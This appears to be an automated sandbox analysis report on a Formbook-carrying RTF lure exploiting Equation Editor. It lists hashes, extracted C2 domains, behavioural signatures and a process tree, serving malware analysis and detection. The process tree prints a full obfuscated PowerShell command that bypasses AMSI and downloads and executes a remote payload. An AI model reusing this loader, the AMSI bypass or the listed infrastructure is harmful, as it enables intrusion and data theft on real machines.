Analysis
-
max time kernel
151s -
max time network
92s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-01-2021 13:43
Static task
static1
Behavioral task
behavioral1
Sample
RFQ TK011821.doc.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
RFQ TK011821.doc.rtf
Resource
win10v20201028
General
-
Target
RFQ TK011821.doc.rtf
-
Size
1.5MB
-
MD5
ec733578c8fccf0e3930ddcb2b337228
-
SHA1
df8b20801a5ee07f8de71679bb434c94858b0f9e
-
SHA256
ef25940acecd4fd916e53386f63b8fb69102f2f13e2b7b9e89f64775da9afa08
-
SHA512
2af97e61aa4b3efbf1e1027f7a937130bf2e31ef21f123beff209dd72a0adbad3d1da6e8244e5ffffc3838c3439d4aa2492498866b4a5d9ba87cfd4d1cda3a59
Malware Config
Extracted
formbook
http://www.sob.xyz/p7v/
angelksuperstar.com
yuchujiaoyu.com
beachmister.com
thebetterleadsacademy.com
maskednun.com
supermarsds.com
cutecvv.com
farmacycharcuterie.com
all-blacknyc.com
supremenursery.com
rcadefurniture.com
efreshlaser.com
quincyit.net
yasalexis1234.com
coachpayment.com
mustgift.com
kolakosaat.xyz
soltecmaredm.info
682n.com
trecommunications.com
yourdailybazar.com
allwebcamsex.com
thyhandywoman.com
arescsg.com
holisticskincarebyjanine.com
shotgun-life.net
qwemalls.com
santantoniabatcanals.com
bhmioxe.icu
webselfs.com
tryhotgirls.com
findmyiphone.services
kilanohitched.com
cbdwithcare.com
katysans.com
seem-elsewhere.info
lashprotool.com
nehyam.com
fnpleveledbooks.com
xn--maison-tmoin-ieb.com
farmacyrussia.com
wnlsgame.com
ortharizona.com
medizinazakon.online
salski.cymru
spidermanskateboards.com
stirsoda.com
kroeget.com
mytherapies.net
wealthforyounow.net
jeveuxreussirmavie.com
babllon.com
brevardcountyfl.com
920happfielddr.info
catalizresearch.com
acid-gaming.net
worldcar-sales.com
buckhead-meat.com
quomic.com
blogkatalog.com
hyfinery.com
ebnfnleoba.club
movecbus.com
globalvantop.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1736 428 Powershell.exe -
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/596-24-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral1/memory/596-25-0x000000000041EA90-mapping.dmp formbook behavioral1/memory/1592-35-0x00000000000E0000-0x000000000010E000-memory.dmp formbook -
Blocklisted process makes network request 4 IoCs
Processes:
Powershell.exeflow pid process 8 1736 Powershell.exe 10 1736 Powershell.exe 12 1736 Powershell.exe 14 1736 Powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Powershell.exenotepad.exeexplorer.exedescription pid process target process PID 1736 set thread context of 596 1736 Powershell.exe notepad.exe PID 596 set thread context of 1236 596 notepad.exe Explorer.EXE PID 1592 set thread context of 1236 1592 explorer.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1652 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
Powershell.exenotepad.exeexplorer.exepid process 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 596 notepad.exe 596 notepad.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
notepad.exeexplorer.exepid process 596 notepad.exe 596 notepad.exe 596 notepad.exe 1592 explorer.exe 1592 explorer.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
Powershell.exenotepad.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1736 Powershell.exe Token: SeIncreaseQuotaPrivilege 1736 Powershell.exe Token: SeSecurityPrivilege 1736 Powershell.exe Token: SeTakeOwnershipPrivilege 1736 Powershell.exe Token: SeLoadDriverPrivilege 1736 Powershell.exe Token: SeSystemProfilePrivilege 1736 Powershell.exe Token: SeSystemtimePrivilege 1736 Powershell.exe Token: SeProfSingleProcessPrivilege 1736 Powershell.exe Token: SeIncBasePriorityPrivilege 1736 Powershell.exe Token: SeCreatePagefilePrivilege 1736 Powershell.exe Token: SeBackupPrivilege 1736 Powershell.exe Token: SeRestorePrivilege 1736 Powershell.exe Token: SeShutdownPrivilege 1736 Powershell.exe Token: SeDebugPrivilege 1736 Powershell.exe Token: SeSystemEnvironmentPrivilege 1736 Powershell.exe Token: SeRemoteShutdownPrivilege 1736 Powershell.exe Token: SeUndockPrivilege 1736 Powershell.exe Token: SeManageVolumePrivilege 1736 Powershell.exe Token: 33 1736 Powershell.exe Token: 34 1736 Powershell.exe Token: 35 1736 Powershell.exe Token: SeIncreaseQuotaPrivilege 1736 Powershell.exe Token: SeSecurityPrivilege 1736 Powershell.exe Token: SeTakeOwnershipPrivilege 1736 Powershell.exe Token: SeLoadDriverPrivilege 1736 Powershell.exe Token: SeSystemProfilePrivilege 1736 Powershell.exe Token: SeSystemtimePrivilege 1736 Powershell.exe Token: SeProfSingleProcessPrivilege 1736 Powershell.exe Token: SeIncBasePriorityPrivilege 1736 Powershell.exe Token: SeCreatePagefilePrivilege 1736 Powershell.exe Token: SeBackupPrivilege 1736 Powershell.exe Token: SeRestorePrivilege 1736 Powershell.exe Token: SeShutdownPrivilege 1736 Powershell.exe Token: SeDebugPrivilege 1736 Powershell.exe Token: SeSystemEnvironmentPrivilege 1736 Powershell.exe Token: SeRemoteShutdownPrivilege 1736 Powershell.exe Token: SeUndockPrivilege 1736 Powershell.exe Token: SeManageVolumePrivilege 1736 Powershell.exe Token: 33 1736 Powershell.exe Token: 34 1736 Powershell.exe Token: 35 1736 Powershell.exe Token: SeDebugPrivilege 596 notepad.exe Token: SeDebugPrivilege 1592 explorer.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1236 Explorer.EXE 1236 Explorer.EXE 1236 Explorer.EXE 1236 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1236 Explorer.EXE 1236 Explorer.EXE 1236 Explorer.EXE 1236 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1652 WINWORD.EXE 1652 WINWORD.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EQNEDT32.EXECmD.exePowershell.exeExplorer.EXEexplorer.exedescription pid process target process PID 1676 wrote to memory of 652 1676 EQNEDT32.EXE CmD.exe PID 1676 wrote to memory of 652 1676 EQNEDT32.EXE CmD.exe PID 1676 wrote to memory of 652 1676 EQNEDT32.EXE CmD.exe PID 1676 wrote to memory of 652 1676 EQNEDT32.EXE CmD.exe PID 652 wrote to memory of 860 652 CmD.exe cscript.exe PID 652 wrote to memory of 860 652 CmD.exe cscript.exe PID 652 wrote to memory of 860 652 CmD.exe cscript.exe PID 652 wrote to memory of 860 652 CmD.exe cscript.exe PID 1736 wrote to memory of 596 1736 Powershell.exe notepad.exe PID 1736 wrote to memory of 596 1736 Powershell.exe notepad.exe PID 1736 wrote to memory of 596 1736 Powershell.exe notepad.exe PID 1736 wrote to memory of 596 1736 Powershell.exe notepad.exe PID 1736 wrote to memory of 596 1736 Powershell.exe notepad.exe PID 1736 wrote to memory of 596 1736 Powershell.exe notepad.exe PID 1736 wrote to memory of 596 1736 Powershell.exe notepad.exe PID 1236 wrote to memory of 1592 1236 Explorer.EXE explorer.exe PID 1236 wrote to memory of 1592 1236 Explorer.EXE explorer.exe PID 1236 wrote to memory of 1592 1236 Explorer.EXE explorer.exe PID 1236 wrote to memory of 1592 1236 Explorer.EXE explorer.exe PID 1592 wrote to memory of 516 1592 explorer.exe cmd.exe PID 1592 wrote to memory of 516 1592 explorer.exe cmd.exe PID 1592 wrote to memory of 516 1592 explorer.exe cmd.exe PID 1592 wrote to memory of 516 1592 explorer.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ TK011821.doc.rtf"2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\WINDOWS\syswow64\notepad.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exeCmD.exe /C cscript %tmp%\Client.vbs AC2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$8003537124631511248003537124631511245654343800353712463151124=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,49,68,55,56,53,70,50,56,53,67,61,36,49,68,55,56,53,70,50,56,53,67,61,87,114,105,116,101,45,72,111,115,116,32,39,69,67,52,65,65,66,53,56,48,56,50,50,51,69,66,55,50,50,70,57,67,50,48,54,51,69,68,48,53,54,54,54,53,65,65,56,48,65,67,53,54,53,56,70,57,68,48,54,56,49,53,55,50,48,55,53,57,67,51,69,66,52,67,52,66,55,48,54,53,55,50,52,67,51,68,69,70,65,54,51,68,69,66,53,56,70,67,51,70,65,57,68,50,50,49,50,49,54,55,52,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,54,55,54,56,48,65,69,49,54,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,54,55,54,56,48,65,69,49,54,59,36,69,55,68,69,65,56,68,66,48,51,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,69,55,68,69,65,56,68,66,48,51,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,57,56,54,52,53,50,57,52,49,52,56,55,52,55,51,52,55,47,56,48,48,51,53,51,55,49,50,52,54,51,49,53,49,49,50,52,47,82,69,80,55,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,69,55,68,69,65,56,68,66,48,51,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,69,55,68,69,65,56,68,66,48,51,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($8003537124631511248003537124631511245654343800353712463151124)|I`E`X1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\notepad.exe"{path}"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbsMD5
344890eb067576658d5008e5b05f257b
SHA155d4eb42fc6e68578226558ad2a33f86f99c3d9d
SHA25610f3df1ad88944665aecb7a7a3c23a7789af0b8a1a329c964f374f2bc879f7e8
SHA512029bd05a91f88d4d32b14dd6d3994636af2ee909c9bb15ec5118125f323470a05d5ce8ec78264bc8c4f3f75efb4765ccf72424159aa31b5667d5ad8f649ecb74
-
memory/516-33-0x0000000000000000-mapping.dmp
-
memory/596-24-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/596-28-0x00000000001D0000-0x00000000001E4000-memory.dmpFilesize
80KB
-
memory/596-27-0x0000000000700000-0x0000000000A03000-memory.dmpFilesize
3.0MB
-
memory/596-25-0x000000000041EA90-mapping.dmp
-
memory/652-6-0x0000000000000000-mapping.dmp
-
memory/860-10-0x0000000002760000-0x0000000002764000-memory.dmpFilesize
16KB
-
memory/860-7-0x0000000000000000-mapping.dmp
-
memory/1236-29-0x0000000004AA0000-0x0000000004BC4000-memory.dmpFilesize
1.1MB
-
memory/1324-22-0x000007FEF7800000-0x000007FEF7A7A000-memory.dmpFilesize
2.5MB
-
memory/1592-36-0x0000000002250000-0x0000000002553000-memory.dmpFilesize
3.0MB
-
memory/1592-35-0x00000000000E0000-0x000000000010E000-memory.dmpFilesize
184KB
-
memory/1592-32-0x000000006B581000-0x000000006B583000-memory.dmpFilesize
8KB
-
memory/1592-30-0x0000000000000000-mapping.dmp
-
memory/1592-34-0x00000000004D0000-0x0000000000751000-memory.dmpFilesize
2.5MB
-
memory/1592-37-0x0000000002090000-0x0000000002123000-memory.dmpFilesize
588KB
-
memory/1652-3-0x0000000070331000-0x0000000070333000-memory.dmpFilesize
8KB
-
memory/1652-2-0x00000000728B1000-0x00000000728B4000-memory.dmpFilesize
12KB
-
memory/1652-4-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1676-5-0x0000000075571000-0x0000000075573000-memory.dmpFilesize
8KB
-
memory/1736-17-0x000000001AA14000-0x000000001AA16000-memory.dmpFilesize
8KB
-
memory/1736-11-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmpFilesize
8KB
-
memory/1736-23-0x000000001C580000-0x000000001C5C5000-memory.dmpFilesize
276KB
-
memory/1736-21-0x000000001AA1A000-0x000000001AA39000-memory.dmpFilesize
124KB
-
memory/1736-20-0x000000001B4A0000-0x000000001B4A1000-memory.dmpFilesize
4KB
-
memory/1736-19-0x000000001B770000-0x000000001B771000-memory.dmpFilesize
4KB
-
memory/1736-18-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/1736-16-0x000000001AA10000-0x000000001AA12000-memory.dmpFilesize
8KB
-
memory/1736-15-0x0000000002710000-0x0000000002711000-memory.dmpFilesize
4KB
-
memory/1736-14-0x000000001AA90000-0x000000001AA91000-memory.dmpFilesize
4KB
-
memory/1736-13-0x00000000022E0000-0x00000000022E1000-memory.dmpFilesize
4KB
-
memory/1736-12-0x000007FEF5330000-0x000007FEF5D1C000-memory.dmpFilesize
9.9MB